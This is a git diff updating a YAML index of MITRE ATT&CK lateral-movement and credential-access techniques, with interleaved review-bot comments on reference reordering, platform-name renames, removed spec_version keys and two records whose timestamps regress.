+ - source_name: Microsoft DEV-0537
+ description: Microsoft. (2022, March 22). DEV-0537 criminal actor targeting
+ organizations for data exfiltration and destruction. Retrieved March 23,
+ 2022.
+ url: https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
lateral-movement:
T1021.005:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T15:20:07.264Z'
name: Remote Services:VNC
description: |-
Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely control machines using Virtual Network Computing (VNC). VNC is a platform-independent desktop sharing system that uses the RFB (“remote framebuffer”) protocol to enable users to remotely control another computer’s display by relaying the screen, mouse, and keyboard inputs over the network.(Citation: The Remote Framebuffer Protocol)
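Review bot: the re-sorted reference list for T1056.004 silently drops the `Zairon Hooking Dec 2006`, `EyeofRa Detecting Hooking June 2017` and `GMER Rootkits` entries; they are removed here and not re-added anywhere in the visible part of this hunk, and the only text that cited them (the `x_mitre_detection` paragraphs removed in the same hunk) is gone too. That is consistent if the regenerated record has an empty detection field, but `HighTech Bridge Inline Hooking Sept 2011` is also removed as a `source_name` while the inline-hooking bullet of the description still carries `(Citation: HighTech Bridge Inline Hooking Sept 2011)`; if the replacement description keeps that citation, the entry must survive in the new list. Because the old `- url / description / source_name` layout was replaced by `- source_name / description / url`, git matched unrelated `description` lines as shared context, so the old record's tail (`credential-access` phase, detection text, `x_mitre_permissions_required`) is interleaved with the new T1213.005 record and cannot be checked from this hunk alone; compare the two T1056.004 objects key by key, or regenerate the diff with `--diff-algorithm=patience`. Two smaller points in the new T1213.005 record: `x_mitre_detection: ''` is an empty string rather than an absent key (fine only if the index consumer tolerates that), and the Sentinel Labs description starts with a stray leading space in `" Jim Walter. (2024, July 16). NullBulge ...` that should be trimmed.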
@@ -41818,6 +42505,7 @@ lateral-movement:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: lateral-movement
+ x_mitre_deprecated: false
x_mitre_detection: |-
Use of VNC may be legitimate depending on the environment and how it’s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior using VNC.
@@ -41827,7 +42515,6 @@ lateral-movement:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
@@ -41843,66 +42530,67 @@ lateral-movement:
id: attack-pattern--01327cde-66c4-4123-bf34-5f258d59457b
created: '2020-02-11T18:28:44.950Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1021/005
external_id: T1021.005
- - source_name: The Remote Framebuffer Protocol
- description: T. Richardson, J. Levine, RealVNC Ltd.. (2011, March). The Remote
- Framebuffer Protocol. Retrieved September 20, 2021.
- url: https://datatracker.ietf.org/doc/html/rfc6143#section-7.2.2
+ - source_name: Attacking VNC Servers PentestLab
+ description: Administrator, Penetration Testing Lab. (2012, October 30). Attacking
+ VNC Servers. Retrieved October 6, 2021.
+ url: https://pentestlab.blog/2012/10/30/attacking-vnc-servers/
- source_name: MacOS VNC software for Remote Desktop
description: Apple Support. (n.d.). Set up a computer running VNC software
for Remote Desktop. Retrieved August 18, 2021.
url: https://support.apple.com/guide/remote-desktop/set-up-a-computer-running-vnc-software-apdbed09830/mac
- - source_name: VNC Authentication
- description: Tegan. (2019, August 15). Setting up System Authentication. Retrieved
- September 20, 2021.
- url: https://help.realvnc.com/hc/en-us/articles/360002250097-Setting-up-System-Authentication
- - source_name: Hijacking VNC
- description: 'Z3RO. (2019, March 10). Day 70: Hijacking VNC (Enum, Brute,
- Access and Crack). Retrieved September 20, 2021.'
- url: https://int0x33.medium.com/day-70-hijacking-vnc-enum-brute-access-and-crack-d3d18a4601cc
+ - source_name: Havana authentication bug
+ description: Jay Pipes. (2013, December 23). Security Breach! Tenant A is
+ seeing the VNC Consoles of Tenant B!. Retrieved September 12, 2024.
+ url: https://lists.openstack.org/pipermail/openstack/2013-December/004138.html
- source_name: macOS root VNC login without authentication
description: Nick Miles. (2017, November 30). Detecting macOS High Sierra
root account without authentication. Retrieved September 20, 2021.
url: https://www.tenable.com/blog/detecting-macos-high-sierra-root-account-without-authentication
- - source_name: VNC Vulnerabilities
- description: Sergiu Gatlan. (2019, November 22). Dozens of VNC Vulnerabilities
- Found in Linux, Windows Solutions. Retrieved September 20, 2021.
- url: https://www.bleepingcomputer.com/news/security/dozens-of-vnc-vulnerabilities-found-in-linux-windows-solutions/
- source_name: Offensive Security VNC Authentication Check
description: Offensive Security. (n.d.). VNC Authentication. Retrieved October
6, 2021.
url: https://www.offensive-security.com/metasploit-unleashed/vnc-authentication/
- - source_name: Attacking VNC Servers PentestLab
- description: Administrator, Penetration Testing Lab. (2012, October 30). Attacking
- VNC Servers. Retrieved October 6, 2021.
- url: https://pentestlab.blog/2012/10/30/attacking-vnc-servers/
- - source_name: Havana authentication bug
- description: Jay Pipes. (2013, December 23). Security Breach! Tenant A is
- seeing the VNC Consoles of Tenant B!. Retrieved October 6, 2021.
- url: http://lists.openstack.org/pipermail/openstack/2013-December/004138.html
- - source_name: Apple Unified Log Analysis Remote Login and Screen Sharing
- description: 'Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs:
- Quarantine Edition [Entry 6] – Working From Home? Remote Logins. Retrieved
- August 19, 2021.'
- url: https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins
- source_name: Gnome Remote Desktop grd-settings
description: Pascal Nowack. (n.d.). Retrieved September 21, 2021.
url: https://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/grd-settings.c#L207
- source_name: Gnome Remote Desktop gschema
description: Pascal Nowack. (n.d.). Retrieved September 21, 2021.
url: https://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/org.gnome.desktop.remote-desktop.gschema.xml.in
+ - source_name: Apple Unified Log Analysis Remote Login and Screen Sharing
+ description: 'Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs:
+ Quarantine Edition [Entry 6] – Working From Home? Remote Logins. Retrieved
+ August 19, 2021.'
+ url: https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins
+ - source_name: VNC Vulnerabilities
+ description: Sergiu Gatlan. (2019, November 22). Dozens of VNC Vulnerabilities
+ Found in Linux, Windows Solutions. Retrieved September 20, 2021.
+ url: https://www.bleepingcomputer.com/news/security/dozens-of-vnc-vulnerabilities-found-in-linux-windows-solutions/
+ - source_name: The Remote Framebuffer Protocol
+ description: T. Richardson, J. Levine, RealVNC Ltd.. (2011, March). The Remote
+ Framebuffer Protocol. Retrieved September 20, 2021.
+ url: https://datatracker.ietf.org/doc/html/rfc6143#section-7.2.2
+ - source_name: VNC Authentication
+ description: Tegan. (2019, August 15). Setting up System Authentication. Retrieved
+ September 20, 2021.
+ url: https://help.realvnc.com/hc/en-us/articles/360002250097-Setting-up-System-Authentication
+ - source_name: Hijacking VNC
+ description: 'Z3RO. (2019, March 10). Day 70: Hijacking VNC (Enum, Brute,
+ Access and Crack). Retrieved September 20, 2021.'
+ url: https://int0x33.medium.com/day-70-hijacking-vnc-enum-brute-access-and-crack-d3d18a4601cc
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1021.005
atomic_tests: []
T1080:
technique:
- modified: '2023-05-31T12:33:20.915Z'
+ modified: '2024-10-15T16:07:36.903Z'
name: Taint Shared Content
description: |2-
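Review bot: this hunk is not a pure reorder of the VNC references; the `Havana authentication bug` entry also changes content: `url: http://lists.openstack.org/pipermail/openstack/2013-December/004138.html` becomes the `https://` form and the retrieval date moves from `October 6, 2021` to `September 12, 2024`. That is a good change, but it is easy to miss among the moved blocks, so call it out in the commit message. `x_mitre_modified_by_ref` is likewise only moved (removed after `x_mitre_is_subtechnique` in the previous hunk, re-added after `x_mitre_attack_spec_version` here), not dropped.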
@@ -41927,11 +42615,11 @@ lateral-movement:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Office 365
- SaaS
- Linux
- macOS
- x_mitre_version: '1.4'
+ - Office Suite
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Network Share: Network Share Access'
- 'Process: Process Creation'
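Review bot: renaming the platform from `Office 365` to `Office Suite` (and, in later hunks of this file, replacing `Azure AD` and `Google Workspace` with `Identity Provider` and `Office Suite`) is a breaking change for anything that filters this index by platform string: any generator or consumer that still matches on the old names, and any atomic test whose `supported_platforms` uses them, will silently stop matching. Check the platform-specific index generators in the same change and consider carrying an old-to-new name mapping during the transition.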
@@ -41954,9 +42642,8 @@ lateral-movement:
url: https://rewtin.blogspot.ch/2017/11/abusing-user-shares-for-efficient.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1021.004:
technique:
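Review bot: `spec_version: '2.1'` is deleted from every technique record in this diff (here alongside the `x_mitre_attack_spec_version: 3.1.0` to `3.2.0` bump). `spec_version` is the STIX 2.1 object version marker, so dropping it changes the shape of each record for any consumer that validates against STIX or reads the key; confirm the upstream ATT&CK export no longer emits it and that nothing in the index tooling depends on it before accepting the removal across the whole file.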
@@ -42007,7 +42694,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1021.004
atomic_tests: []
T1091:
@@ -42071,7 +42757,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1091
atomic_tests: []
T1021.008:
@@ -42142,7 +42827,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1563.001:
technique:
@@ -42179,7 +42863,7 @@ lateral-movement:
url: https://matrix.org/blog/2019/05/08/post-mortem-and-remediations-for-apr-11-security-incident
description: Hodgson, M. (2019, May 8). Post-mortem and remediations for Apr
11 security incident. Retrieved February 17, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-23T23:11:24.682Z'
name: SSH Hijacking
description: |-
Adversaries may hijack a legitimate user's SSH session to move laterally within an environment. Secure Shell (SSH) is a standard means of remote access on Linux and macOS systems. It allows a user to connect to another system via an encrypted tunnel, commonly authenticating through a password, certificate or the use of an asymmetric encryption key pair.
@@ -42210,8 +42894,6 @@ lateral-movement:
- root
x_mitre_system_requirements:
- SSH service enabled, trust relationships configured, established connections
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1021.002:
technique:
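Review bot: after this hunk T1563.001 has no version marker at all: both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` are removed and, unlike the other techniques in this diff, no `x_mitre_attack_spec_version: 3.2.0` (or `x_mitre_modified_by_ref`) is added in their place. Together with the `modified` timestamp moving backwards in the preceding hunk (`2021-04-29T14:49:39.188Z` to `2020-03-23T23:11:24.682Z`), this looks like the SSH Hijacking record was regenerated from an older or deprecated copy of the ATT&CK object rather than the current one; verify the source object before merging.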
@@ -42294,12 +42976,11 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1021.002
atomic_tests: []
T1550:
technique:
- modified: '2024-04-12T21:18:23.798Z'
+ modified: '2024-10-15T16:09:19.001Z'
name: Use Alternate Authentication Material
description: "Adversaries may use alternate authentication material, such as
password hashes, Kerberos tickets, and application access tokens, in order
@@ -42326,6 +43007,7 @@ lateral-movement:
phase_name: lateral-movement
x_mitre_contributors:
- Blake Strom, Microsoft Threat Intelligence
+ - Pawel Partyka, Microsoft Threat Intelligence
x_mitre_deprecated: false
x_mitre_detection: 'Configure robust, consistent account activity audit policies
across the enterprise and with externally accessible services.(Citation: TechNet
@@ -42343,12 +43025,12 @@ lateral-movement:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Office 365
- SaaS
- - Google Workspace
- IaaS
- Containers
- x_mitre_version: '1.3'
+ - Identity Provider
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Logon Session: Logon Session Creation'
@@ -42374,14 +43056,13 @@ lateral-movement:
description: NIST. (n.d.). Authentication. Retrieved January 30, 2020.
url: https://csrc.nist.gov/glossary/term/authentication
- source_name: NIST MFA
- description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved January
- 30, 2020.
- url: https://csrc.nist.gov/glossary/term/Multi_Factor-Authentication
+ description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved September
+ 25, 2024.
+ url: https://csrc.nist.gov/glossary/term/multi_factor_authentication
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1021:
technique:
@@ -42499,7 +43180,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1563:
technique:
@@ -42553,11 +43233,10 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1021.006:
technique:
- modified: '2023-08-11T15:26:41.941Z'
+ modified: '2024-09-12T15:28:23.398Z'
name: 'Remote Services: Windows Remote Management'
description: |-
Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.
@@ -42609,14 +43288,13 @@ lateral-movement:
April 27, 2016.
url: https://msdn.microsoft.com/en-us/library/aa394582.aspx
- source_name: Microsoft WinRM
- description: Microsoft. (n.d.). Windows Remote Management. Retrieved November
- 12, 2014.
- url: http://msdn.microsoft.com/en-us/library/aa384426
+ description: Microsoft. (n.d.). Windows Remote Management. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/winrm/portal
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1021.006
atomic_tests: []
T1021.003:
@@ -42702,12 +43380,11 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1021.003
atomic_tests: []
T1550.003:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-09-12T15:21:09.330Z'
name: 'Use Alternate Authentication Material: Pass the Ticket'
description: |-
Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.
@@ -42727,6 +43404,7 @@ lateral-movement:
x_mitre_contributors:
- Vincent Le Toux
- Ryan Becwar
+ x_mitre_deprecated: false
x_mitre_detection: |-
Audit all Kerberos authentication and credential use events and review for discrepancies. Unusual remote authentication events that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity.
@@ -42734,7 +43412,6 @@ lateral-movement:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
@@ -42750,39 +43427,40 @@ lateral-movement:
id: attack-pattern--7b211ac6-c815-4189-93a9-ab415deca926
created: '2020-01-30T17:03:43.072Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1550/003
external_id: T1550.003
- - source_name: ADSecurity AD Kerberos Attacks
- description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
- Kerberos Attacks. Retrieved June 2, 2016.
- url: https://adsecurity.org/?p=556
- - source_name: GentilKiwi Pass the Ticket
- description: Deply, B. (2014, January 13). Pass the ticket. Retrieved June
- 2, 2016.
- url: http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+ - source_name: CERT-EU Golden Ticket Protection
+ description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
+ April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
+ url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
- source_name: Campbell 2014
description: Campbell, C. (2014). The Secret Life of Krbtgt. Retrieved December
4, 2014.
url: http://defcon.org/images/defcon-22/dc-22-presentations/Campbell/DEFCON-22-Christopher-Campbell-The-Secret-Life-of-Krbtgt.pdf
+ - source_name: GentilKiwi Pass the Ticket
+ description: Deply, B. (2014, January 13). Pass the ticket. Retrieved September
+ 12, 2024.
+ url: https://web.archive.org/web/20210515214027/https://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+ - source_name: ADSecurity AD Kerberos Attacks
+ description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
+ Kerberos Attacks. Retrieved June 2, 2016.
+ url: https://adsecurity.org/?p=556
- source_name: Stealthbits Overpass-the-Hash
description: Warren, J. (2019, February 26). How to Detect Overpass-the-Hash
Attacks. Retrieved February 4, 2021.
url: https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/
- - source_name: CERT-EU Golden Ticket Protection
- description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
- April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
- url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1550.003
atomic_tests: []
T1021.007:
technique:
- modified: '2023-04-14T22:27:04.095Z'
+ modified: '2024-10-15T15:52:47.255Z'
name: Cloud Services
description: "Adversaries may log into accessible cloud services within a compromised
environment using [Valid Accounts](https://attack.mitre.org/techniques/T1078)
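Review bot: the `GentilKiwi Pass the Ticket` reference changes substantively inside what otherwise reads as a reorder: its `url` now points to a `web.archive.org` snapshot of the original `blog.gentilkiwi.com` post and the retrieval date moves from `June 2, 2016` to `September 12, 2024`. Worth a line in the commit message so the archive-link substitution is recorded as deliberate rather than as an artifact of the regeneration.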
@@ -42807,12 +43485,11 @@ lateral-movement:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Office 365
- - Azure AD
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.0'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
type: attack-pattern
@@ -42826,13 +43503,12 @@ lateral-movement:
external_id: T1021.007
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1072:
technique:
- modified: '2024-04-12T03:40:37.954Z'
+ modified: '2024-09-25T20:49:37.227Z'
name: Software Deployment Tools
description: "Adversaries may gain access to and use centralized software suites
installed within an enterprise to execute commands and move laterally through
@@ -42849,7 +43525,7 @@ lateral-movement:
on cloud-hosted instances, as well as the execution of arbitrary commands
on on-premises endpoints. For example, Microsoft Configuration Manager allows
Global or Intune Administrators to run scripts as SYSTEM on on-premises devices
- joined to Azure AD.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
+ joined to Entra ID.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
AD 2020) Such services may also utilize [Web Protocols](https://attack.mitre.org/techniques/T1071/001)
to communicate back to adversary owned infrastructure.(Citation: Mitiga Security
Advisory: SSM Agent as Remote Access Trojan)\n\nNetwork infrastructure devices
@@ -42897,7 +43573,7 @@ lateral-movement:
- Windows
- Network
- SaaS
- x_mitre_version: '3.0'
+ x_mitre_version: '3.1'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Application Log: Application Log Content'
@@ -42930,7 +43606,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1072
atomic_tests: []
T1210:
@@ -42969,7 +43644,7 @@ lateral-movement:
description: National Vulnerability Database. (2017, September 24). CVE-2014-7169
Detail. Retrieved April 3, 2018.
source_name: NVD CVE-2014-7169
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-02-24T15:06:46.006Z'
name: Exploitation of Remote Services
description: |-
Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system.
@@ -43003,12 +43678,10 @@ lateral-movement:
and goal, the system and exploitable service may need to be remotely accessible
from the internal network.
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
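Review bot: same pattern as T1563.001: T1210 loses both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` with no replacement `x_mitre_attack_spec_version`, and its `modified` timestamp in the previous hunk goes backwards (`2022-05-11T14:00:00.188Z` to `2022-02-24T15:06:46.006Z`). Two records regressing in the same way suggests the source data for these two techniques is older than for the rest of the file; check how they were produced rather than patching the records by hand.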
T1534:
technique:
- modified: '2024-02-16T13:09:39.215Z'
+ modified: '2024-10-15T15:59:36.741Z'
name: Internal Spearphishing
description: |-
After they already have access to accounts or systems within the environment, adversaries may use internal spearphishing to gain access to additional information or compromise other users within the same organization. Internal spearphishing is multi-staged campaign where a legitimate account is initially compromised either by controlling the user's device or by compromising the account credentials of the user. Adversaries may then attempt to take advantage of the trusted internal account to increase the likelihood of tricking more victims into falling for phish attempts, often incorporating [Impersonation](https://attack.mitre.org/techniques/T1656).(Citation: Trend Micro - Int SP)
@@ -43036,10 +43709,9 @@ lateral-movement:
- Windows
- macOS
- Linux
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Traffic Flow'
@@ -43069,7 +43741,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1570:
technique:
@@ -43131,12 +43802,11 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1570
atomic_tests: []
T1550.004:
technique:
- modified: '2023-09-19T21:26:24.725Z'
+ modified: '2024-10-15T16:11:15.657Z'
name: Web Session Cookie
description: |-
Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.(Citation: Pass The Cookie)
@@ -43160,11 +43830,10 @@ lateral-movement:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Office 365
- SaaS
- - Google Workspace
- IaaS
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Web Credential: Web Credential Usage'
@@ -43189,9 +43858,8 @@ lateral-movement:
url: https://wunderwuzzi23.github.io/blog/passthecookie.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1563.002:
technique:
@@ -43251,7 +43919,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1563.002
atomic_tests: []
T1550.002:
@@ -43306,7 +43973,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1550.002
atomic_tests: []
T1021.001:
@@ -43374,12 +44040,11 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1021.001
atomic_tests: []
T1550.001:
technique:
- modified: '2024-04-12T21:18:28.848Z'
+ modified: '2024-10-15T15:38:11.583Z'
name: Application Access Token
description: "Adversaries may use stolen application access tokens to bypass
the typical authentication process and access restricted accounts, information,
@@ -43436,6 +44101,7 @@ lateral-movement:
- Dylan Silva, AWS Security
- Jack Burns, HubSpot
- Blake Strom, Microsoft Threat Intelligence
+ - Pawel Partyka, Microsoft Threat Intelligence
x_mitre_deprecated: false
x_mitre_detection: 'Monitor access token activity for abnormal use and permissions
granted to unusual or suspicious applications and APIs. Additionally, administrators
@@ -43446,13 +44112,12 @@ lateral-movement:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Office 365
- SaaS
- - Google Workspace
- Containers
- IaaS
- - Azure AD
- x_mitre_version: '1.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.7'
x_mitre_data_sources:
- 'Web Credential: Web Credential Usage'
x_mitre_defense_bypassed:
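Review bot: besides the `Office Suite` rename, T1550.001 replaces `Azure AD` with `Identity Provider`, a platform value that does not appear in the old object. Confirm that whatever enumerates platforms to build the per-platform outputs accepts `Identity Provider`; otherwise the technique quietly disappears from the identity-related views with no error, because a platform-name mismatch is not a failure in a string filter.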
@@ -43511,7 +44176,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
credential-access:
T1557:
@@ -43605,49 +44269,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1556.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Scott Knight, @sdotknight, VMware Carbon Black
- - George Allen, VMware Carbon Black
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
- type: attack-pattern
